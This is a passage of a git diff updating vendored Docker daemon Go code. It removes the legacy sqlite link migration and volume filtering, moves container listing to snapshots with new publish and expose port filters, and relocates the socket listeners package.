- // if links is populated (or an empty slice), then this isn't using sqlite links and can be skipped - if container.HostConfig == nil || container.HostConfig.Links != nil { - return nil - } - - logrus.Debugf("migrating legacy sqlite link info for container: %s", container.ID) - - fullName := container.Name - if fullName[0] != '/' { - fullName = "/" + fullName - } - - // don't use a nil slice, this ensures that the check above will skip once the migration has completed - links := []string{} - children, err := db.Children(fullName, 0) - if err != nil { - if !strings.Contains(err.Error(), "Cannot find child for") { - return err - } - // else continue... it's ok if we didn't find any children, it'll just be nil and we can continue the migration - } - - for _, child := range children { - c, err := daemon.GetContainer(child.Entity.ID()) - if err != nil { - return err - } - - links = append(links, c.Name+":"+child.Edge.Name) - } - - container.HostConfig.Links = links - return container.WriteHostConfig() -} - -// sqliteMigration performs the link graph DB migration. -func (daemon *Daemon) sqliteMigration(containers map[string]*container.Container) error { - // migrate any legacy links from sqlite - linkdbFile := filepath.Join(daemon.root, "linkgraph.db") - var ( - legacyLinkDB *graphdb.Database - err error - ) - - legacyLinkDB, err = graphdb.NewSqliteConn(linkdbFile) - if err != nil { - return fmt.Errorf("error connecting to legacy link graph DB %s, container links may be lost: %v", linkdbFile, err) - } - defer legacyLinkDB.Close() - - for _, c := range containers { - if err := daemon.migrateLegacySqliteLinks(legacyLinkDB, c); err != nil { - return err - } - } - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/links_linux_test.go b/vendor/github.com/docker/docker/daemon/links_linux_test.go deleted file mode 100644 index e2dbff2d25..0000000000 --- a/vendor/github.com/docker/docker/daemon/links_linux_test.go +++ /dev/null @@ -1,98 +0,0 @@ -package daemon - -import ( - "encoding/json" - "io/ioutil" - "os" - "path" - "path/filepath" - "testing" - - containertypes "github.com/docker/docker/api/types/container" - "github.com/docker/docker/container" - "github.com/docker/docker/pkg/graphdb" - "github.com/docker/docker/pkg/stringid" -) - -func TestMigrateLegacySqliteLinks(t *testing.T) { - tmpDir, err := ioutil.TempDir("", "legacy-qlite-links-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpDir) - - name1 := "test1" - c1 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: stringid.GenerateNonCryptoID(), - Name: name1, - HostConfig: &containertypes.HostConfig{}, - }, - } - c1.Root = tmpDir - - name2 := "test2" - c2 := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: stringid.GenerateNonCryptoID(), - Name: name2, - }, - } - - store := container.NewMemoryStore() - store.Add(c1.ID, c1) - store.Add(c2.ID, c2) - - d := &Daemon{root: tmpDir, containers: store} - db, err := graphdb.NewSqliteConn(filepath.Join(d.root, "linkgraph.db")) - if err != nil { - t.Fatal(err) - } - - if _, err := db.Set("/"+name1, c1.ID); err != nil { - t.Fatal(err) - } - - if _, err := db.Set("/"+name2, c2.ID); err != nil { - t.Fatal(err) - } - - alias := "hello" - if _, err := db.Set(path.Join(c1.Name, alias), c2.ID); err != nil { - t.Fatal(err) - } - - if err := d.migrateLegacySqliteLinks(db, c1); err != nil { - t.Fatal(err) - } - - if len(c1.HostConfig.Links) != 1 { - t.Fatal("expected links to be populated but is empty") - } - - expected := name2 + ":" + alias - actual := c1.HostConfig.Links[0] - if actual != expected { - t.Fatalf("got wrong link value, expected: %q, got: %q", expected, actual) - } - - // ensure this is persisted - b, err := ioutil.ReadFile(filepath.Join(c1.Root, "hostconfig.json")) - if err != nil { - t.Fatal(err) - } - type hc struct { - Links []string - } - var cfg hc - if err := json.Unmarshal(b, &cfg); err != nil { - t.Fatal(err) - } - - if len(cfg.Links) != 1 { - t.Fatalf("expected one entry in links, got: %d", len(cfg.Links)) - } - if cfg.Links[0] != expected { // same expected as above - t.Fatalf("got wrong link value, expected: %q, got: %q", expected, cfg.Links[0]) - } -} diff --git a/vendor/github.com/docker/docker/daemon/links_notlinux.go b/vendor/github.com/docker/docker/daemon/links_notlinux.go deleted file mode 100644 index 12c226cfac..0000000000 --- a/vendor/github.com/docker/docker/daemon/links_notlinux.go +++ /dev/null @@ -1,10 +0,0 @@ -// +build !linux - -package daemon - -import "github.com/docker/docker/container" - -// sqliteMigration performs the link graph DB migration. No-op on platforms other than Linux -func (daemon *Daemon) sqliteMigration(_ map[string]*container.Container) error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/list.go b/vendor/github.com/docker/docker/daemon/list.go index 02805ea62b..750079f966 100644 --- a/vendor/github.com/docker/docker/daemon/list.go +++ b/vendor/github.com/docker/docker/daemon/list.go @@ -1,29 +1,22 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "errors" "fmt" "sort" "strconv" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - networktypes "github.com/docker/docker/api/types/network" "github.com/docker/docker/container" + "github.com/docker/docker/daemon/images" + "github.com/docker/docker/errdefs" "github.com/docker/docker/image" - "github.com/docker/docker/volume" "github.com/docker/go-connections/nat" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) -var acceptedVolumeFilterTags = map[string]bool{ - "dangling": true, - "name": true, - "driver": true, - "label": true, -} - var acceptedPsFilterTags = map[string]bool{ "ancestor": true, "before": true, @@ -38,6 +31,8 @@ var acceptedPsFilterTags = map[string]bool{ "volume": true, "network": true, "is-task": true, + "publish": true, + "expose": true, } // iterationAction represents possible outcomes happening during the container iteration. @@ -45,7 +40,7 @@ type iterationAction int // containerReducer represents a reducer for a container. // Returns the object to serialize by the api. -type containerReducer func(*container.Container, *listContext) (*types.Container, error) +type containerReducer func(*container.Snapshot, *listContext) (*types.Container, error) const ( // includeContainer is the action to include a container in the reducer. @@ -81,33 +76,39 @@ type listContext struct { exitAllowed []int // beforeFilter is a filter to ignore containers that appear before the one given - beforeFilter *container.Container + beforeFilter *container.Snapshot // sinceFilter is a filter to stop the filtering when the iterator arrive to the given container - sinceFilter *container.Container + sinceFilter *container.Snapshot // taskFilter tells if we should filter based on wether a container is part of a task taskFilter bool // isTask tells us if the we should filter container that are a task (true) or not (false) isTask bool + + // publish is a list of published ports to filter with + publish map[nat.Port]bool + // expose is a list of exposed ports to filter with + expose map[nat.Port]bool + // ContainerListOptions is the filters set by the user *types.ContainerListOptions } -// byContainerCreated is a temporary type used to sort a list of containers by creation time. -type byContainerCreated []*container.Container +// byCreatedDescending is a temporary type used to sort a list of containers by creation time. +type byCreatedDescending []container.Snapshot -func (r byContainerCreated) Len() int { return len(r) } -func (r byContainerCreated) Swap(i, j int) { r[i], r[j] = r[j], r[i] } -func (r byContainerCreated) Less(i, j int) bool { - return r[i].Created.UnixNano() < r[j].Created.UnixNano() +func (r byCreatedDescending) Len() int { return len(r) } +func (r byCreatedDescending) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byCreatedDescending) Less(i, j int) bool { + return r[j].CreatedAt.UnixNano() < r[i].CreatedAt.UnixNano() } // Containers returns the list of containers to show given the user's filtering. func (daemon *Daemon) Containers(config *types.ContainerListOptions) ([]*types.Container, error) { - return daemon.reduceContainers(config, daemon.transformContainer) + return daemon.reduceContainers(config, daemon.refreshImage) } -func (daemon *Daemon) filterByNameIDMatches(ctx *listContext) []*container.Container { +func (daemon *Daemon) filterByNameIDMatches(view container.View, ctx *listContext) ([]container.Snapshot, error) { idSearch := false names := ctx.filters.Get("name") ids := ctx.filters.Get("id") @@ -115,7 +116,9 @@ func (daemon *Daemon) filterByNameIDMatches(ctx *listContext) []*container.Conta // if name or ID filters are not in use, return to // standard behavior of walking the entire container // list from the daemon's in-memory store - return daemon.List() + all, err := view.All() + sort.Sort(byCreatedDescending(all)) + return all, err } // idSearch will determine if we limit name matching to the IDs @@ -150,38 +153,52 @@ func (daemon *Daemon) filterByNameIDMatches(ctx *listContext) []*container.Conta } } - cntrs := make([]*container.Container, 0, len(matches)) + cntrs := make([]container.Snapshot, 0, len(matches)) for id := range matches { - if c := daemon.containers.Get(id); c != nil { - cntrs = append(cntrs, c) + c, err := view.Get(id) + switch err.(type) { + case nil: + cntrs = append(cntrs, *c) + case container.NoSuchContainerError: + // ignore error + default: + return nil, err } } // Restore sort-order after filtering // Created gives us nanosec resolution for sorting - sort.Sort(sort.Reverse(byContainerCreated(cntrs))) + sort.Sort(byCreatedDescending(cntrs)) - return cntrs + return cntrs, nil } // reduceContainers parses the user's filtering options and generates the list of containers to return based on a reducer. func (daemon *Daemon) reduceContainers(config *types.ContainerListOptions, reducer containerReducer) ([]*types.Container, error) { + if err := config.Filters.Validate(acceptedPsFilterTags); err != nil { + return nil, err + } + var ( + view = daemon.containersReplica.Snapshot() containers = []*types.Container{} ) - ctx, err := daemon.foldFilter(config) + ctx, err := daemon.foldFilter(view, config) if err != nil { return nil, err } // fastpath to only look at a subset of containers if specific name // or ID matches were provided by the user--otherwise we potentially - // end up locking and querying many more containers than intended - containerList := daemon.filterByNameIDMatches(ctx) + // end up querying many more containers than intended + containerList, err := daemon.filterByNameIDMatches(view, ctx) + if err != nil { + return nil, err + } - for _, container := range containerList { - t, err := daemon.reducePsContainer(container, ctx, reducer) + for i := range containerList { + t, err := daemon.reducePsContainer(&containerList[i], ctx, reducer) if err != nil { if err != errStopIteration { return nil, err @@ -198,13 +215,9 @@ func (daemon *Daemon) reduceContainers(config *types.ContainerListOptions, reduc } // reducePsContainer is the basic representation for a container as expected by the ps command. -func (daemon *Daemon) reducePsContainer(container *container.Container, ctx *listContext, reducer containerReducer) (*types.Container, error) { - container.Lock() - defer container.Unlock() - +func (daemon *Daemon) reducePsContainer(container *container.Snapshot, ctx *listContext, reducer containerReducer) (*types.Container, error) { // filter containers to return - action := includeContainerInList(container, ctx) - switch action { + switch includeContainerInList(container, ctx) { case excludeContainer: return nil, nil case stopIteration: @@ -212,17 +225,24 @@ func (daemon *Daemon) reducePsContainer(container *container.Container, ctx *lis } // transform internal container struct into api structs - return reducer(container, ctx) + newC, err := reducer(container, ctx) + if err != nil { + return nil, err + } + + // release lock because size calculation is slow + if ctx.Size { + sizeRw, sizeRootFs := daemon.imageService.GetContainerLayerSize(newC.ID) + newC.SizeRw = sizeRw + newC.SizeRootFs = sizeRootFs + } + return newC, nil } // foldFilter generates the container filter based on the user's filtering options. -func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listContext, error) { +func (daemon *Daemon) foldFilter(view container.View, config *types.ContainerListOptions) (*listContext, error) { psFilters := config.Filters - if err := psFilters.Validate(acceptedPsFilterTags); err != nil { - return nil, err - } - var filtExited []int err := psFilters.WalkValues("exited", func(value string) error { @@ -239,7 +259,7 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte err = psFilters.WalkValues("status", func(value string) error { if !container.IsValidStateString(value) { - return fmt.Errorf("Unrecognised filter value for status: %s", value) + return invalidFilter{"status", value} } config.All = true @@ -250,7 +270,7 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte } var taskFilter, isTask bool - if psFilters.Include("is-task") { + if psFilters.Contains("is-task") { if psFilters.ExactMatch("is-task", "true") { taskFilter = true isTask = true @@ -258,13 +278,13 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte taskFilter = true isTask = false } else { - return nil, fmt.Errorf("Invalid filter 'is-task=%s'", psFilters.Get("is-task")) + return nil, invalidFilter{"is-task", psFilters.Get("is-task")} } } err = psFilters.WalkValues("health", func(value string) error { if !container.IsValidHealthString(value) { - return fmt.Errorf("Unrecognised filter value for health: %s", value) + return errdefs.InvalidParameter(errors.Errorf("Unrecognised filter value for health: %s", value)) } return nil @@ -273,10 +293,10 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte return nil, err } - var beforeContFilter, sinceContFilter *container.Container + var beforeContFilter, sinceContFilter *container.Snapshot err = psFilters.WalkValues("before", func(value string) error { - beforeContFilter, err = daemon.GetContainer(value) + beforeContFilter, err = idOrNameFilter(view, value) return err }) if err != nil { @@ -284,7 +304,7 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte } err = psFilters.WalkValues("since", func(value string) error { - sinceContFilter, err = daemon.GetContainer(value) + sinceContFilter, err = idOrNameFilter(view, value) return err }) if err != nil { @@ -293,24 +313,36 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte imagesFilter := map[image.ID]bool{} var ancestorFilter bool - if psFilters.Include("ancestor") { + if psFilters.Contains("ancestor") { ancestorFilter = true psFilters.WalkValues("ancestor", func(ancestor string) error { - id, err := daemon.GetImageID(ancestor) + img, err := daemon.imageService.GetImage(ancestor) if err != nil { logrus.Warnf("Error while looking up for image %v", ancestor) return nil } - if imagesFilter[id] { + if imagesFilter[img.ID()] { // Already seen this ancestor, skip it return nil } // Then walk down the graph and put the imageIds in imagesFilter - populateImageFilterByParents(imagesFilter, id, daemon.imageStore.Children) + populateImageFilterByParents(imagesFilter, img.ID(), daemon.imageService.Children) return nil }) } + publishFilter := map[nat.Port]bool{} + err = psFilters.WalkValues("publish", portOp("publish", publishFilter)) + if err != nil { + return nil, err + } + + exposeFilter := map[nat.Port]bool{} + err = psFilters.WalkValues("expose", portOp("expose", exposeFilter)) + if err != nil { + return nil, err + } + return &listContext{ filters: psFilters, ancestorFilter: ancestorFilter, @@ -320,14 +352,61 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte sinceFilter: sinceContFilter, taskFilter: taskFilter, isTask: isTask, + publish: publishFilter, + expose: exposeFilter, ContainerListOptions: config, - names: daemon.nameIndex.GetAll(), + names: view.GetAllNames(), }, nil } +func idOrNameFilter(view container.View, value string) (*container.Snapshot, error) { + filter, err := view.Get(value) + switch err.(type) { + case container.NoSuchContainerError: + // Try name search instead + found := "" + for id, idNames := range view.GetAllNames() { + for _, eachName := range idNames { + if strings.TrimPrefix(value, "/") == strings.TrimPrefix(eachName, "/") { + if found != "" && found != id { + return nil, err + } + found = id + } + } + } + if found != "" { + filter, err = view.Get(found) + } + } + return filter, err +} + +func portOp(key string, filter map[nat.Port]bool) func(value string) error { + return func(value string) error { + if strings.Contains(value, ":") { + return fmt.Errorf("filter for '%s' should not contain ':': %s", key, value) + } + //support two formats, original format /[] or /[] + proto, port := nat.SplitProtoPort(value) + start, end, err := nat.ParsePortRange(port) + if err != nil { + return fmt.Errorf("error while looking up for %s %s: %s", key, value, err) + } + for i := start; i <= end; i++ { + p, err := nat.NewPort(proto, strconv.FormatUint(i, 10)) + if err != nil { + return fmt.Errorf("error while looking up for %s %s: %s", key, value, err) + } + filter[p] = true + } + return nil + } +} + // includeContainerInList decides whether a container should be included in the output or not based in the filter. // It also decides if the iteration should be stopped or not. -func includeContainerInList(container *container.Container, ctx *listContext) iterationAction { +func includeContainerInList(container *container.Snapshot, ctx *listContext) iterationAction { // Do not include container if it's in the list before the filter container. // Set the filter container to nil to include the rest of containers after this one. if ctx.beforeFilter != nil { @@ -366,7 +445,7 @@ func includeContainerInList(container *container.Container, ctx *listContext) it } // Do not include container if any of the labels don't match - if !ctx.filters.MatchKVList("label", container.Config.Labels) { + if !ctx.filters.MatchKVList("label", container.Labels) { return excludeContainer } @@ -384,7 +463,7 @@ func includeContainerInList(container *container.Container, ctx *listContext) it if len(ctx.exitAllowed) > 0 { shouldSkip := true for _, code := range ctx.exitAllowed { - if code == container.ExitCode() && !container.Running && !container.StartedAt.IsZero() { + if code == container.ExitCode && !container.Running && !container.StartedAt.IsZero() { shouldSkip = false break } @@ -395,28 +474,34 @@ func includeContainerInList(container *container.Container, ctx *listContext) it } // Do not include container if its status doesn't match the filter - if !ctx.filters.Match("status", container.State.StateString()) { + if !ctx.filters.Match("status", container.State) { return excludeContainer } // Do not include container if its health doesn't match the filter - if !ctx.filters.ExactMatch("health", container.State.HealthString()) { + if !ctx.filters.ExactMatch("health", container.Health) { return excludeContainer } - if ctx.filters.Include("volume") { - volumesByName := make(map[string]*volume.MountPoint) - for _, m := range container.MountPoints { + if ctx.filters.Contains("volume") { + volumesByName := make(map[string]types.MountPoint) + for _, m := range container.Mounts { if m.Name != "" { volumesByName[m.Name] = m } else { volumesByName[m.Source] = m } } + volumesByDestination := make(map[string]types.MountPoint) + for _, m := range container.Mounts { + if m.Destination != "" { + volumesByDestination[m.Destination] = m + } + } volumeExist := fmt.Errorf("volume mounted in container") err := ctx.filters.WalkValues("volume", func(value string) error { - if _, exist := container.MountPoints[value]; exist { + if _, exist := volumesByDestination[value]; exist { return volumeExist } if _, exist := volumesByName[value]; exist { @@ -433,22 +518,28 @@ func includeContainerInList(container *container.Container, ctx *listContext) it if len(ctx.images) == 0 { return excludeContainer } - if !ctx.images[container.ImageID] { + if !ctx.images[image.ID(container.ImageID)] { return excludeContainer } } - networkExist := fmt.Errorf("container part of network") - if ctx.filters.Include("network") { + var ( + networkExist = errors.New("container part of network") + noNetworks = errors.New("container is not part of any networks") + ) + if ctx.filters.Contains("network") { err := ctx.filters.WalkValues("network", func(value string) error { + if container.NetworkSettings == nil { + return noNetworks + } if _, ok := container.NetworkSettings.Networks[value]; ok { return networkExist } for _, nw := range container.NetworkSettings.Networks { - if nw.EndpointSettings == nil { + if nw == nil { continue } - if nw.NetworkID == value { + if strings.HasPrefix(nw.NetworkID, value) { return networkExist } } @@ -459,195 +550,51 @@ func includeContainerInList(container *container.Container, ctx *listContext) it } } - return includeContainer -} - -// transformContainer generates the container type expected by the docker ps command. -func (daemon *Daemon) transformContainer(container *container.Container, ctx *listContext) (*types.Container, error) { - newC := &types.Container{ - ID: container.ID, - Names: ctx.names[container.ID], - ImageID: container.ImageID.String(), - } - if newC.Names == nil { - // Dead containers will often have no name, so make sure the response isn't null - newC.Names = []string{} - } - - image := container.Config.Image // if possible keep the original ref - if image != container.ImageID.String() { - id, err := daemon.GetImageID(image) - if _, isDNE := err.(ErrImageDoesNotExist); err != nil && !isDNE { - return nil, err - } - if err != nil || id != container.ImageID { - image = container.ImageID.String() - } - } - newC.Image = image - - if len(container.Args) > 0 { - args := []string{} - for _, arg := range container.Args { - if strings.Contains(arg, " ") { - args = append(args, fmt.Sprintf("'%s'", arg)) - } else { - args = append(args, arg) + if len(ctx.publish) > 0 { + shouldSkip := true + for port := range ctx.publish { + if _, ok := container.PortBindings[port]; ok { + shouldSkip = false + break } } - argsAsString := strings.Join(args, " ") - - newC.Command = fmt.Sprintf("%s %s", container.Path, argsAsString) - } else { - newC.Command = container.Path - } - newC.Created = container.Created.Unix() - newC.State = container.State.StateString() - newC.Status = container.State.String() - newC.HostConfig.NetworkMode = string(container.HostConfig.NetworkMode) - // copy networks to avoid races - networks := make(map[string]*networktypes.EndpointSettings) - for name, network := range container.NetworkSettings.Networks { - if network == nil || network.EndpointSettings == nil { - continue - } - networks[name] = &networktypes.EndpointSettings{ - EndpointID: network.EndpointID, - Gateway: network.Gateway, - IPAddress: network.IPAddress, - IPPrefixLen: network.IPPrefixLen, - IPv6Gateway: network.IPv6Gateway, - GlobalIPv6Address: network.GlobalIPv6Address, - GlobalIPv6PrefixLen: network.GlobalIPv6PrefixLen, - MacAddress: network.MacAddress, - NetworkID: network.NetworkID, - } - if network.IPAMConfig != nil { - networks[name].IPAMConfig = &networktypes.EndpointIPAMConfig{ - IPv4Address: network.IPAMConfig.IPv4Address, - IPv6Address: network.IPAMConfig.IPv6Address, - } + if shouldSkip { + return excludeContainer } } - newC.NetworkSettings = &types.SummaryNetworkSettings{Networks: networks} - newC.Ports = []types.Port{} - for port, bindings := range container.NetworkSettings.Ports { - p, err := nat.ParsePort(port.Port()) - if err != nil { - return nil, err - } - if len(bindings) == 0 { - newC.Ports = append(newC.Ports, types.Port{ - PrivatePort: uint16(p), - Type: port.Proto(), - }) - continue - } - for _, binding := range bindings { - h, err := nat.ParsePort(binding.HostPort) - if err != nil { - return nil, err + if len(ctx.expose) > 0 { + shouldSkip := true + for port := range ctx.expose { + if _, ok := container.ExposedPorts[port]; ok { + shouldSkip = false + break } - newC.Ports = append(newC.Ports, types.Port{ - PrivatePort: uint16(p), - PublicPort: uint16(h), - Type: port.Proto(), - IP: binding.HostIP, - }) } - } - - if ctx.Size { - sizeRw, sizeRootFs := daemon.getSize(container) - newC.SizeRw = sizeRw - newC.SizeRootFs = sizeRootFs - } - newC.Labels = container.Config.Labels - newC.Mounts = addMountPoints(container) - - return newC, nil -} - -// Volumes lists known volumes, using the filter to restrict the range -// of volumes returned. -func (daemon *Daemon) Volumes(filter string) ([]*types.Volume, []string, error) { - var ( - volumesOut []*types.Volume - ) - volFilters, err := filters.FromParam(filter) - if err != nil { - return nil, nil, err - } - - if err := volFilters.Validate(acceptedVolumeFilterTags); err != nil { - return nil, nil, err - } - - volumes, warnings, err := daemon.volumes.List() - if err != nil { - return nil, nil, err - } - - filterVolumes, err := daemon.filterVolumes(volumes, volFilters) - if err != nil { - return nil, nil, err - } - for _, v := range filterVolumes { - apiV := volumeToAPIType(v) - if vv, ok := v.(interface { - CachedPath() string - }); ok { - apiV.Mountpoint = vv.CachedPath() - } else { - apiV.Mountpoint = v.Path() + if shouldSkip { + return excludeContainer } - volumesOut = append(volumesOut, apiV) } - return volumesOut, warnings, nil -} -// filterVolumes filters volume list according to user specified filter -// and returns user chosen volumes -func (daemon *Daemon) filterVolumes(vols []volume.Volume, filter filters.Args) ([]volume.Volume, error) { - // if filter is empty, return original volume list - if filter.Len() == 0 { - return vols, nil - } + return includeContainer +} - var retVols []volume.Volume - for _, vol := range vols { - if filter.Include("name") { - if !filter.Match("name", vol.Name()) { - continue - } - } - if filter.Include("driver") { - if !filter.Match("driver", vol.DriverName()) { - continue - } - } - if filter.Include("label") { - v, ok := vol.(volume.DetailedVolume) - if !ok { - continue - } - if !filter.MatchKVList("label", v.Labels()) { - continue - } +// refreshImage checks if the Image ref still points to the correct ID, and updates the ref to the actual ID when it doesn't +func (daemon *Daemon) refreshImage(s *container.Snapshot, ctx *listContext) (*types.Container, error) { + c := s.Container + image := s.Image // keep the original ref if still valid (hasn't changed) + if image != s.ImageID { + img, err := daemon.imageService.GetImage(image) + if _, isDNE := err.(images.ErrImageDoesNotExist); err != nil && !isDNE { + return nil, err } - retVols = append(retVols, vol) - } - danglingOnly := false - if filter.Include("dangling") { - if filter.ExactMatch("dangling", "true") || filter.ExactMatch("dangling", "1") { - danglingOnly = true - } else if !filter.ExactMatch("dangling", "false") && !filter.ExactMatch("dangling", "0") { - return nil, fmt.Errorf("Invalid filter 'dangling=%s'", filter.Get("dangling")) + if err != nil || img.ImageID() != s.ImageID { + // ref changed, we need to use original ID + image = s.ImageID } - retVols = daemon.volumes.FilterByUsed(retVols, !danglingOnly) } - return retVols, nil + c.Image = image + return &c, nil } func populateImageFilterByParents(ancestorMap map[image.ID]bool, imageID image.ID, getChildren func(image.ID) []image.ID) { diff --git a/vendor/github.com/docker/docker/daemon/list_test.go b/vendor/github.com/docker/docker/daemon/list_test.go new file mode 100644 index 0000000000..3be510d13d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/list_test.go @@ -0,0 +1,26 @@ +package daemon + +import ( + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/container" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestListInvalidFilter(t *testing.T) { + db, err := container.NewViewDB() + assert.Assert(t, err == nil) + d := &Daemon{ + containersReplica: db, + } + + f := filters.NewArgs(filters.Arg("invalid", "foo")) + + _, err = d.Containers(&types.ContainerListOptions{ + Filters: f, + }) + assert.Assert(t, is.Error(err, "Invalid filter 'invalid'")) +} diff --git a/vendor/github.com/docker/docker/daemon/list_unix.go b/vendor/github.com/docker/docker/daemon/list_unix.go index 91c9caccf4..4f9e453bc2 100644 --- a/vendor/github.com/docker/docker/daemon/list_unix.go +++ b/vendor/github.com/docker/docker/daemon/list_unix.go @@ -1,11 +1,11 @@ -// +build linux freebsd solaris +// +build linux freebsd -package daemon +package daemon // import "github.com/docker/docker/daemon" import "github.com/docker/docker/container" // excludeByIsolation is a platform specific helper function to support PS // filtering by Isolation. This is a Windows-only concept, so is a no-op on Unix. -func excludeByIsolation(container *container.Container, ctx *listContext) iterationAction { +func excludeByIsolation(container *container.Snapshot, ctx *listContext) iterationAction { return includeContainer } diff --git a/vendor/github.com/docker/docker/daemon/list_windows.go b/vendor/github.com/docker/docker/daemon/list_windows.go index 7fbcd3af26..7c7b5fa856 100644 --- a/vendor/github.com/docker/docker/daemon/list_windows.go +++ b/vendor/github.com/docker/docker/daemon/list_windows.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "strings" @@ -8,7 +8,7 @@ import ( // excludeByIsolation is a platform specific helper function to support PS // filtering by Isolation. This is a Windows-only concept, so is a no-op on Unix. -func excludeByIsolation(container *container.Container, ctx *listContext) iterationAction { +func excludeByIsolation(container *container.Snapshot, ctx *listContext) iterationAction { i := strings.ToLower(string(container.HostConfig.Isolation)) if i == "" { i = "default" diff --git a/vendor/github.com/docker/docker/daemon/listeners/group_unix.go b/vendor/github.com/docker/docker/daemon/listeners/group_unix.go new file mode 100644 index 0000000000..9cc17eba7b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/listeners/group_unix.go @@ -0,0 +1,34 @@ +// +build !windows + +package listeners // import "github.com/docker/docker/daemon/listeners" + +import ( + "fmt" + "strconv" + + "github.com/opencontainers/runc/libcontainer/user" + "github.com/pkg/errors" +) + +const defaultSocketGroup = "docker" + +func lookupGID(name string) (int, error) { + groupFile, err := user.GetGroupPath() + if err != nil { + return -1, errors.Wrap(err, "error looking up groups") + } + groups, err := user.ParseGroupFileFilter(groupFile, func(g user.Group) bool { + return g.Name == name || strconv.Itoa(g.Gid) == name + }) + if err != nil { + return -1, errors.Wrapf(err, "error parsing groups for %s", name) + } + if len(groups) > 0 { + return groups[0].Gid, nil + } + gid, err := strconv.Atoi(name) + if err == nil { + return gid, nil + } + return -1, fmt.Errorf("group %s not found", name) +} diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go b/vendor/github.com/docker/docker/daemon/listeners/listeners_linux.go similarity index 75% rename from vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go rename to vendor/github.com/docker/docker/daemon/listeners/listeners_linux.go index 1bcae7aa3e..c8956db258 100644 --- a/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go +++ b/vendor/github.com/docker/docker/daemon/listeners/listeners_linux.go @@ -1,16 +1,15 @@ -// +build !windows,!solaris - -package listeners +package listeners // import "github.com/docker/docker/daemon/listeners" import ( "crypto/tls" "fmt" "net" + "os" "strconv" - "github.com/Sirupsen/logrus" "github.com/coreos/go-systemd/activation" "github.com/docker/go-connections/sockets" + "github.com/sirupsen/logrus" ) // Init creates new listeners for the server. @@ -32,7 +31,17 @@ func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) ([]net.Listene } ls = append(ls, l) case "unix": - l, err := sockets.NewUnixSocket(addr, socketGroup) + gid, err := lookupGID(socketGroup) + if err != nil { + if socketGroup != "" { + if socketGroup != defaultSocketGroup { + return nil, err + } + logrus.Warnf("could not change group %s to %s: %v", addr, defaultSocketGroup, err) + } + gid = os.Getgid() + } + l, err := sockets.NewUnixSocket(addr, gid) if err != nil { return nil, fmt.Errorf("can't create unix socket %s: %v", addr, err) } @@ -53,9 +62,9 @@ func listenFD(addr string, tlsConfig *tls.Config) ([]net.Listener, error) { ) // socket activation if tlsConfig != nil { - listeners, err = activation.TLSListeners(false, tlsConfig) + listeners, err = activation.TLSListeners(tlsConfig) } else { - listeners, err = activation.Listeners(false) + listeners, err = activation.Listeners() } if err != nil { return nil, err @@ -75,7 +84,7 @@ func listenFD(addr string, tlsConfig *tls.Config) ([]net.Listener, error) { return nil, fmt.Errorf("failed to parse systemd fd address: should be a number: %v", addr) } fdOffset := fdNum - 3 - if len(listeners) < int(fdOffset)+1 { + if len(listeners) < fdOffset+1 { return nil, fmt.Errorf("too few socket activated files passed in by systemd") } if listeners[fdOffset] == nil { @@ -86,8 +95,7 @@ func listenFD(addr string, tlsConfig *tls.Config) ([]net.Listener, error) { continue } if err := ls.Close(); err != nil { - // TODO: We shouldn't log inside a library. Remove this or error out. - logrus.Errorf("failed to close systemd activated file: fd %d: %v", fdOffset+3, err) + return nil, fmt.Errorf("failed to close systemd activated file: fd %d: %v", fdOffset+3, err) } } return []net.Listener{listeners[fdOffset]}, nil diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go b/vendor/github.com/docker/docker/daemon/listeners/listeners_windows.go similarity index 94% rename from vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go rename to vendor/github.com/docker/docker/daemon/listeners/listeners_windows.go index 5b5a470fc6..73f5f79e4b 100644 --- a/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go +++ b/vendor/github.com/docker/docker/daemon/listeners/listeners_windows.go @@ -1,4 +1,4 @@ -package listeners +package listeners // import "github.com/docker/docker/daemon/listeners" import ( "crypto/tls" diff --git a/vendor/github.com/docker/docker/daemon/logdrivers_linux.go b/vendor/github.com/docker/docker/daemon/logdrivers_linux.go index ad343c1e8e..6ddcd2fc8d 100644 --- a/vendor/github.com/docker/docker/daemon/logdrivers_linux.go +++ b/vendor/github.com/docker/docker/daemon/logdrivers_linux.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( // Importing packages here only to make sure their init gets called and diff --git a/vendor/github.com/docker/docker/daemon/logdrivers_windows.go b/vendor/github.com/docker/docker/daemon/logdrivers_windows.go index f3002b97e2..62e7a6f95b 100644 --- a/vendor/github.com/docker/docker/daemon/logdrivers_windows.go +++ b/vendor/github.com/docker/docker/daemon/logdrivers_windows.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( // Importing packages here only to make sure their init gets called and @@ -6,6 +6,7 @@ import ( _ 